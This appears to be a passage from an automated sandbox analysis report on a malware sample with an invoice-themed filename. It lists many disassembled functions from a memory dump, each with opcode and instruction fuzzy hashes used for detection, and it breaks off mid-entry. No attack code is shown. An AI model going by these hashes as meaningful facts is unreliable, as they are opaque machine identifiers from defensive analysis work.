Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e673c43a29ea9e72b8bea5ca935b604829658c9af652dfc9b41eb565414c249
Instruction ID: ebdde0f66efdbd7cabd6b827a714ac105ae7042297eca46803a02386ca50518c
Opcode Fuzzy Hash: 7e673c43a29ea9e72b8bea5ca935b604829658c9af652dfc9b41eb565414c249
Instruction Fuzzy Hash: 36119172280615EBC722DB59CD84FDAF7A8EF99B60F11406DF605DB351DA70E901CBA0

Function 0175E8C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a6b211ae3ec89ce557339190e28a90eb6b5ce30219772ee68cd382302b81b0
Instruction ID: 614bef8412a7a5927ae14e8e6c2bf65a27fb98328c768a19509f224c9e42e1a0
Opcode Fuzzy Hash: 42a6b211ae3ec89ce557339190e28a90eb6b5ce30219772ee68cd382302b81b0
Instruction Fuzzy Hash: 9A1108733001249FCF1ADB29DC85A6BF666EBD5370B358539ED26CB290EE309D46C291

Function 017666B0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae413a55300a1d82ba5232f5832e12cd019b88352011bccc41182852e11fc6ef
Instruction ID: d672061d116b0d7306c30326e69a7db2568e500328afe8aed3efe1bdd3fc32ea
Opcode Fuzzy Hash: ae413a55300a1d82ba5232f5832e12cd019b88352011bccc41182852e11fc6ef
Instruction Fuzzy Hash: 3411ECB2A00201AFCB26DF59D880A1AFBE9EF94200F5580B9ED059B311F638DD00CBA0

Function 017FA8E4 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction ID: 945120e6c9c09e11b9f6f8db143c7edc6f79dc56e256a048ae209fe370d0189c
Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction Fuzzy Hash: 3D11C436A00915EFDB19CB58CC05B9EFBF5EF84210F058269E95597344E671AE51CB80

Function 01730AD0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction ID: ee2594f3f6aa01914295660ec8516dc92154788fdb7d6d8805fb6266621dfe3b
Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction Fuzzy Hash: D32106B5A00B059FD3A0CF29C440B52BBF4FB48B20F10492EE98AC7B40E371E814CB90

Function 017BE7E1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction ID: 15ace5546c928e1d04848733ddabb999a1c9d69e78c0786b0ac68a5a3460521a
Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction Fuzzy Hash: E711A032640A01EFE7219F49C884BDAFBE6EF45754F059428EA099B361DF71DC40DB90

Function 017527ED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb29bce83192ba68fb00316cb87f493847d2e18dfac3709895678d5d7455c40d
Instruction ID: f3d5f9a6bdda6e93e39b5a28ff1725935e18b229e3b313270f7879109115faf4
Opcode Fuzzy Hash: cb29bce83192ba68fb00316cb87f493847d2e18dfac3709895678d5d7455c40d
Instruction Fuzzy Hash: 2C012B31746645ABE316526DE888F67FB9CEF41354F0900B4FD008B241DA65EC00C2A1

Function 01734690 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a191ddd0cb19ba5949e816701469fa565a57f5dd343bc0b3aa2fe81b1417c5
Instruction ID: 4ed632a6124c5039d93490da236cede6793cf625b619e7964e707fbc487ee0db
Opcode Fuzzy Hash: 70a191ddd0cb19ba5949e816701469fa565a57f5dd343bc0b3aa2fe81b1417c5
Instruction Fuzzy Hash: 4B11AC76240645AFDB2ACF59D844B56BBA8EBC6B64F004119F9068B692C370E800CF60

Function 01804B00 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d0881a848c7e2d2cfa864c24d1097e6aab911b06616e1d35c31ed5985ae4efb
Instruction ID: 76b5c44e50a96534af3c06daadccdf1fbb929cbf9732ea6e62564290df519082
Opcode Fuzzy Hash: 0d0881a848c7e2d2cfa864c24d1097e6aab911b06616e1d35c31ed5985ae4efb
Instruction Fuzzy Hash: E9110632240A199FD7639AADDC54F16B7A5FFC4310F144419EB82C72D0DA30EA02CB90

Function 01766620 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f14a8d4ded1a2dc0591d611498461ef692651cd008ed3bb2f8bfe791ff26ef0
Instruction ID: abcc6b844414f7049207a782eba389a3837f3f474673bf0a44811c167c7689da
Opcode Fuzzy Hash: 6f14a8d4ded1a2dc0591d611498461ef692651cd008ed3bb2f8bfe791ff26ef0
Instruction Fuzzy Hash: 1211A572A00716ABDB22EF59D984B5EFBBCFF84750F900555EE05A7245D730ED018B90

Function 0175EA2E Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5acb2c4d6bae207407b85493715242f033775cab8eb03bbdbf2d813b0d6e8876
Instruction ID: 075613905a4eaa140f2f8c45fc6492f2ecded067f8c04fc5debb2de9ad82f95c
Opcode Fuzzy Hash: 5acb2c4d6bae207407b85493715242f033775cab8eb03bbdbf2d813b0d6e8876
Instruction Fuzzy Hash: 4E01DE7154010A9FD326DF28D408FA6FBF9EB81314F20816AE5048B665DBB0AE82CF90

Function 0175E53E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction ID: 0975cd785177768574dddeab8d335876e358734f04c6550815d7bcff5234af6b
Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction Fuzzy Hash: 721108722056C29BEB239B2CE948B25FFD4FB01758F2900E1DE45C7642FB78CA46C650

Function 017BE75D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction ID: e4976abaf543776d5b35805a7161d271b8da536e7198735f9eacf6c706833c3e
Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction Fuzzy Hash: 9D019272600105AFE7219F59C884FDAFBA9EB85760F058474EA059B364EB75DD80C790

Function 0172A250 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction ID: 3d1a10d03f39aef32267bb68beaabdbd5529b6e0ec4c971b06f8f0ba2a54fef4
Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction Fuzzy Hash: AF01D6715097329BCB318F19D840A36FBE5EF96760701896DFD958BA81D731D402CB60

Function 01804940 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2020a1afabaf8d591ea6e646ae0e407ac5fa901e3249ba268b09830aa3b0176
Instruction ID: 871c3b4b3109086364694ef0f9d6ddb62d4a2da1fe551aa419521af4c0d82eb4
Opcode Fuzzy Hash: c2020a1afabaf8d591ea6e646ae0e407ac5fa901e3249ba268b09830aa3b0176
Instruction Fuzzy Hash: BD010432581519ABC373DF1C9C04E12B7A8EB81370B264265EA68DB1F6D730DA11CBC0

Function 017AE1D0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace15db1c2048c74275e8ac56629c03acce7a66d2d2a24dc82fb63170d37d41b
Instruction ID: 9d092239de26b570c24fce9548523023e6b667cbe7a5eb414774ea633a112ee2
Opcode Fuzzy Hash: ace15db1c2048c74275e8ac56629c03acce7a66d2d2a24dc82fb63170d37d41b
Instruction Fuzzy Hash: 9211AD32241641EFDB16EF19CD84F56BBB8FF98B94F2000A5EE059B6A1D735ED01CA90

Function 01736259 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 710bdb2fb78d7b96e7e45d3e613ba59bd338cf654ffaa99916c7f40b0e6b34f3
Instruction ID: 96be2725ea63ee56e34e6350edb5494e9a19403286d5a0273f57e4324478b096
Opcode Fuzzy Hash: 710bdb2fb78d7b96e7e45d3e613ba59bd338cf654ffaa99916c7f40b0e6b34f3
Instruction Fuzzy Hash: BB115A71641229ABDF36AB64CC46FE9B278FF44710F5041D4A328A60E1EB709E81CF88

Function 017B6050 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b71d33ef09b1f7e0b5656e0f6e1ff26233485763a1bd724bd06f6cc4364616d
Instruction ID: af2767dab99a1654015c000dd43437c9913c7adf28f163dcd6895660eb29ab8e
Opcode Fuzzy Hash: 3b71d33ef09b1f7e0b5656e0f6e1ff26233485763a1bd724bd06f6cc4364616d
Instruction Fuzzy Hash: 85112973900019ABCB22DB95CC84EEFBB7CEF48254F044166E906E7211EA34EA15CBE1

Function 0173208A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction ID: bace1b893963c836053ae1431bdca96490ae1891fe35d18012eea28f43b3556a
Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction Fuzzy Hash: F20124332001108BEF52AA2DD880B96FB67BFC4700F1540A9ED458F25BEA71CC81C7A0

Function 017C6500 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d375e413fe5cd4e064e9437424ae91a9d87ab87be54dc0baa22f5306e7fec531
Instruction ID: c9c983518139e97d087743435c50688c802d31d6eac5c2a3b218e0e754d39415
Opcode Fuzzy Hash: d375e413fe5cd4e064e9437424ae91a9d87ab87be54dc0baa22f5306e7fec531
Instruction Fuzzy Hash: CD11A1726441469FD711CF58E840BA6FBB9FB6A714F28815DF8488B315D732ED81CBA0

Function 017BC810 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f2165dfd67633bde1ce61db7483006b91a3e471830d306b78926964444e7134
Instruction ID: b885c83a566efeb4524ac22cc5d212e21480198462f01885413847068a84ee74
Opcode Fuzzy Hash: 6f2165dfd67633bde1ce61db7483006b91a3e471830d306b78926964444e7134
Instruction Fuzzy Hash: 1D111CB1A002099BCB00DF99D585AAEF7F4FF58250F10806AE905E7355D674EA01CBA4

Function 017DEA60 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a0825075c2befabaa088d9e86e1f345fa7a1d7b8d8b2e44b8c83efe46d858c5
Instruction ID: 78139bf63f242e6d49c2fbcf1ddf7a0adbc917860500326c4bbaa734e5f8be6e
Opcode Fuzzy Hash: 3a0825075c2befabaa088d9e86e1f345fa7a1d7b8d8b2e44b8c83efe46d858c5
Instruction Fuzzy Hash: 8001B1311402269FCB33AA198844936FBB9FF91660B54446AF6455F211CF209E81CBD2

Function 0172C020 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction ID: a8296f2b5ee79dad8c6962276dbc8979dc6dc9e21921fa74713f73baa76319ca
Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction Fuzzy Hash: 880128321007059FEB33A6A9C804EABF7E9FFD5250F14441AEA468B580DE74E442CB60

Function 017720F0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a000b3bab4d8fb681175b739bb439689fb6a48a735d952ff60307c986cac8761
Instruction ID: 8fe279d1a051c88b5c4a597b33899a9e1436fefbac8fc451f30a355523b20368
Opcode Fuzzy Hash: a000b3bab4d8fb681175b739bb439689fb6a48a735d952ff60307c986cac8761
Instruction Fuzzy Hash: 7D116D35A0120DEFDF15DF64D854FAEBBB5FB44240F004059F91697255E635AE11CB90

Function 0176E5CF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f60be33aff69699e02281ed3d046f41be1de6761d05c77a1b8436b5fd23e71b
Instruction ID: b9e9fa1d9b2d3f27572bdcef0ab22b668ea0bf28a8a01170787cd444cd4ca027
Opcode Fuzzy Hash: 3f60be33aff69699e02281ed3d046f41be1de6761d05c77a1b8436b5fd23e71b
Instruction Fuzzy Hash: C401A771201511BFD311BB7DCD88E57FBACFF946547100625B60983691DB64EC11C6E4

Function 017C69C0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9adf4901c828b6c7fa2cd3f3ac7b9a3a46574d0ddc214dc8e42b2c5254185545
Instruction ID: 9d99189efc057a62ca1d10bb027a8f45daf055008bae180905b63b404e810f9d
Opcode Fuzzy Hash: 9adf4901c828b6c7fa2cd3f3ac7b9a3a46574d0ddc214dc8e42b2c5254185545
Instruction Fuzzy Hash: 0301FC32214212DBD720DF6DC88896BFBE8FF54B60F11412DF95987280E7309A01C7D1

Function 017BC460 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e5ffe8c2b92bb067e3d0cb55299bcf3f279418cfa1e83839d1a7d6f42486919
Instruction ID: 411f13e29e3958d3c304f5a26b11cdf375032548c474ce45ffe496184c0a4e89
Opcode Fuzzy Hash: 5e5ffe8c2b92bb067e3d0cb55299bcf3f279418cfa1e83839d1a7d6f42486919
Instruction Fuzzy Hash: 91115B71A01209EBDF16EFA8C884EEEBBB5FB48240F008059F90197344DB38EE11DB90

Function 017BC97C Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dac5bbe84519c455ea12314a638bb4d03b7922b5ac4fa43a95091f4423b18cd
Instruction ID: 41a591b60f7b10ec8d2576917092b3339b419104144b8e6906bd3cb9fffb519c
Opcode Fuzzy Hash: 5dac5bbe84519c455ea12314a638bb4d03b7922b5ac4fa43a95091f4423b18cd
Instruction Fuzzy Hash: C41139B16193099FC710DF69D445A9BFBE4FF98710F00855AF998D7395E630E900CB92

Function 01804A80 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
Instruction ID: e367e4c6868d41fb7176e6a6e009154d543d9a2caf65bd19f5e59713fabdcda7
Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
Instruction Fuzzy Hash: 6A01B5322406099FDB629A99DC44E56B7E6FBC5310F044419EB42CB690DAB1F980C754

Function 017BCA11 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61bbdf7a0e562960a90d9b4ec08d26c9ee6c13bf1611c85429579bc0df2b6644
Instruction ID: 7818b17e0e818332a6c86fddbe78777b51597032d4ebe4239731cec55d316b29
Opcode Fuzzy Hash: 61bbdf7a0e562960a90d9b4ec08d26c9ee6c13bf1611c85429579bc0df2b6644
Instruction Fuzzy Hash: BC1179B16083089FC710DF69C485A9BFBE4FF99350F00851AF998D73A4E630E900CB92

Function 0174E016 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction ID: f071b29c9915aba8204431dbb13597158596fc771e04defe0e302dfe7d164aed
Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction Fuzzy Hash: 85017C322405809FE322961DC948F36FBE8FF85764F1904A1FA15CBAA2DB3CDC40C621

Function 0172826B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af8126e2c749867642f79811e16e61f83ce14f418386f7cf197312fbcb7c87d
Instruction ID: 2db2d8508f2520a3c327ae5811f65f1b9f74c0ffdb68e1ab0169da36e7c49112
Opcode Fuzzy Hash: 8af8126e2c749867642f79811e16e61f83ce14f418386f7cf197312fbcb7c87d
Instruction Fuzzy Hash: AD014731704514DBC714EB69EC18AAEF7E8FF45220B154029DA02EB344EE30DE02C792

Function 017DEB50 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e52321342c1cb2c7a8439147f447de10f8f362cd59267acddae6ebff9f1a86ab
Instruction ID: 6ec637ae1b01ad7f6d03771133892196e22f9ae24d2dff4dee0fefe1a249c698
Opcode Fuzzy Hash: e52321342c1cb2c7a8439147f447de10f8f362cd59267acddae6ebff9f1a86ab
Instruction Fuzzy Hash: 8C01DF71240615AFD3335E19D840F12FAB8EF58B50F11482AFB068F394DAB4A9808BA4

Function 01732582 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c54f020090a7f9696009da6d133d9ec4728416c14f945d14894d85ecb8a3fbc2
Instruction ID: 4bb83470f6057b04f3219941519ee95d2f2cecafae9bbc1fe8218f67604a950f
Opcode Fuzzy Hash: c54f020090a7f9696009da6d133d9ec4728416c14f945d14894d85ecb8a3fbc2
Instruction Fuzzy Hash: 32F0F433641A20B7C7319B5A8C44F17FAA9EBC8A90F104068A60597641DA30ED01CAB0

Function 0175C073 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction ID: 447908f1e264f7bc2826cc1f2ebd0dadb775d804acdceaacc1c2184f9b8a6370
Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction Fuzzy Hash: F3F0C2B2600611ABD335CF4DDC40F57FBEEDBD5A90F048128AA09CB220EA71DD04CB90

Function 0172C310 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction ID: 950a8341ab7169d5f9f245597cd768939ef3f1fdc46db0127db3622beadce19e
Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction Fuzzy Hash: 38F0FC332446339BD73316594844B6FE9958FF5AA4F190435E3099B245CA648D0356D2

Function 0180634F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7049519beeaec73023be1d6de0a6886fc923fe27938ab78844fe70730a420ecc
Instruction ID: a2d5e0709a26393a546de9e62bcafc16ddb9970876fc5a6569c911209ce123e4
Opcode Fuzzy Hash: 7049519beeaec73023be1d6de0a6886fc923fe27938ab78844fe70730a420ecc
Instruction Fuzzy Hash: 6A012C71A1020DEBDB04DFA9D955AAEB7F8FF58304F10406AE905E7390D6749A019BA1

Function 018062D6 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

